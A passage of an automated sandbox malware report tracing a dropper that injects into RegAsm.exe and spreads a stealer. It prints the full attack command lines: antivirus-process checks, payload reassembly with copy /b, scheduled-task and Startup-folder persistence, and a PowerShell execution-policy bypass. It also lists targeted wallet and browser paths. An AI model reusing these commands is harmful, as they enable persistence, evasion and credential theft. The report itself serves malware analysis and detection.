                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13078B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307918Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130797CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13079E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307A44Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307AA8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307B0CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307B70Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307BD4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307C38Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307C9CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307D00Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307D64Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307DC8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307E2CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307E90Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307EF4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307F58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307FBCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308020Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308084Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13080E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130814CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13081B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308214Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308278Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13082DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308340Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13083A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308408Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130846CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13084D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308534Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308598Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13085FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308660Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13086C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308728Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130878CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13087F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308854Jump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003C1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,27_2_003C1B4D
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_0036338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,27_2_0036338B
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003CBBED SendInput,keybd_event,27_2_003CBBED
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003CEC6C mouse_event,27_2_003CEC6C
                  Source: C:\Users\user\Desktop\ADFoyxP.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\curcuma.exe "C:\Users\user\AppData\Local\Temp\curcuma.exe"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\maintains.pub + ..\legislation.pub + ..\blood.pub + ..\document.pub + ..\breaks.pub + ..\both.pub + ..\explicitly.pub + ..\governor.pub + ..\bull.pub + ..\comparison.pub + ..\performing.pub + ..\gate.pub + ..\republican.pub + ..\reverse.pub + ..\thousand.pub + ..\apartments.pub + ..\swingers.pub + ..\urban.pub + ..\robert.pub + ..\regulation.pub + ..\confusion.pub + ..\listening.pub + ..\generating.pub + ..\argentina.pub + ..\amenities.pub + ..\vacation.pub + ..\vampire.pub + ..\trademarks.pub + ..\distinguished.pub + ..\silly.pub + ..\hell.pub + ..\worcester.pub + ..\concept.pub + ..\enlarge.pub + ..\preference.pub + ..\poem.pub m
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradesecure innovations\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exit
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003C14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,27_2_003C14AE
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 27_2_003C1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,27_2_003C1FB0
                  Source: Seat.com, 00000013.00000003.1371153350.00000000045FC000.00000004.00000800.00020000.00000000.sdmp, Seat.com, 00000013.00000000.1359117606.0000000000C93000.00000002.00000001.01000000.00000007.sdmp, TradeHub.com, 0000001B.00000000.1393288924.0000000000423000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: RegAsm.exe, 0000001E.00000002.2523751705.000000000393B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2523751705.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2523751705.000000000359D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
                  Source: TradeHub.com, RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: ProgMan
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd!SHELLDLL_DefView
                  Source: RegAsm.exe, 0000001E.00000002.2523751705.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2523751705.000000000359D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager`,
                  Source: RegAsm.exe, 0000001E.00000002.2523751705.000000000393B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2523751705.000000000359D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager@\
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00380A08 cpuid 27_2_00380A08
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003BE5F4 GetLocalTime,27_2_003BE5F4
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003BE652 GetUserNameW,27_2_003BE652
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0039BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,27_2_0039BCD2
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: procexp.exe
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Electrum#\Electrum\wallets
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: exodus
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                  Source: TradeHub.comBinary or memory string: WIN_81
                  Source: TradeHub.comBinary or memory string: WIN_XP
                  Source: TradeHub.com, 0000001D.00000000.1470085264.0000000000423000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: TradeHub.comBinary or memory string: WIN_XPe
                  Source: TradeHub.comBinary or memory string: WIN_VISTA
                  Source: TradeHub.comBinary or memory string: WIN_7
                  Source: TradeHub.comBinary or memory string: WIN_8
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003E2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,27_2_003E2263
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003E1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,27_2_003E1C61
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
